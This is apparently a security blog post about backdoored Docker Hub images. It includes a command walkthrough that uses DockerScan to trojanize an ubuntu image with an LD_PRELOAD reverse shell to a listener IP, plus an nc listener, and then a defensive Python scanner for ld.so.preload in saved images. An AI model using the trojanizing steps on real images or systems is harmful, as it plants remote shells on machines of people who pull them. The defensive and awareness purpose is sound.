Over the past year, there were 17 backdoored Docker images identified and removed from Docker Hub. These malicious images, uploaded under the pseudonym “docker123321,” were used to install reverse shells and cryptocurrency miners on users’ servers. The images were available on Docker Hub between May 2017 and May 2018 before they were taken down. This situation highlights the importance of vigilance and the need for security measures when using public repositories to pull Docker images​. (The New Stack)


Download and install DockerScan

git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install

Create Reverse shell with LD_PRELOAD trick

mkdir backdoor && cd backdoor
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu-original
export LC_ALL=C.UTF-8
export LANG=C.UTF-8
dockerscan image modify trojanize ubuntu-original <listener_ip> -p 45678 -o ubuntu-trojanized
docker load -i ubuntu-trojanized.tar

Setup Remote Listener and deploy image

remote_server> nc -l 45678

docker run -d ubuntu-trojanized
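A defender-side check for images pulled from a public registry, added here as an example that is not part of DockerScan or the original post: it parses a `docker save` tarball and reports every layer that ships /etc/ld.so.preload, the loader file an LD_PRELOAD-style injection relies on (assumed here to be how the trojanized image hooks processes). The image it builds for testing is constructed sample data, not a real image.

```python
import io
import json
import os
import tarfile
import tempfile

PRELOAD_PATH = "etc/ld.so.preload"  # read by the dynamic loader on every exec


def _layers(image_tar):
    """Yield (name, TarFile) for each layer in a `docker save` tarball.
    Handles the legacy <id>/layer.tar layout and the OCI blobs/sha256/<digest> layout."""
    for member in image_tar.getmembers():
        if not member.isfile():
            continue
        if member.name.endswith("layer.tar") or member.name.startswith("blobs/sha256/"):
            data = image_tar.extractfile(member).read()
            try:
                layer = tarfile.open(fileobj=io.BytesIO(data))
            except tarfile.ReadError:
                continue  # config/manifest JSON blobs also live under blobs/; skip them
            yield member.name, layer


def find_preload_hooks(image_tar_path):
    """Return [(layer_name, [library paths])] for every layer that writes /etc/ld.so.preload."""
    findings = []
    with tarfile.open(image_tar_path) as image_tar:
        for layer_name, layer in _layers(image_tar):
            for m in layer.getmembers():
                if m.isfile() and m.name.lstrip("./") == PRELOAD_PATH:
                    text = layer.extractfile(m).read().decode("utf-8", "replace")
                    libs = [ln.strip() for ln in text.splitlines()
                            if ln.strip() and not ln.lstrip().startswith("#")]
                    findings.append((layer_name, libs))
    return findings


def build_sample_image(preload_lines=None, path=None):
    """Construct a minimal docker-save-style tarball with one layer (test data only).
    With preload_lines=None the layer is clean; otherwise it carries an ld.so.preload file."""
    path = path or os.path.join(tempfile.mkdtemp(), "sample-image.tar")
    files = {"bin/true": b""}
    if preload_lines is not None:
        files[PRELOAD_PATH] = ("\n".join(preload_lines) + "\n").encode()
    layer_buf = io.BytesIO()
    with tarfile.open(fileobj=layer_buf, mode="w") as layer:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            layer.addfile(info, io.BytesIO(data))
    manifest = json.dumps([{"Config": "cfg.json", "Layers": ["layer1/layer.tar"]}]).encode()
    with tarfile.open(path, "w") as image:
        for name, data in (("manifest.json", manifest), ("layer1/layer.tar", layer_buf.getvalue())):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            image.addfile(info, io.BytesIO(data))
    return path
```

Run it over the output of `docker save <image> -o image.tar` before loading the image; any non-empty finding on a base image that should not preload anything deserves a closer look.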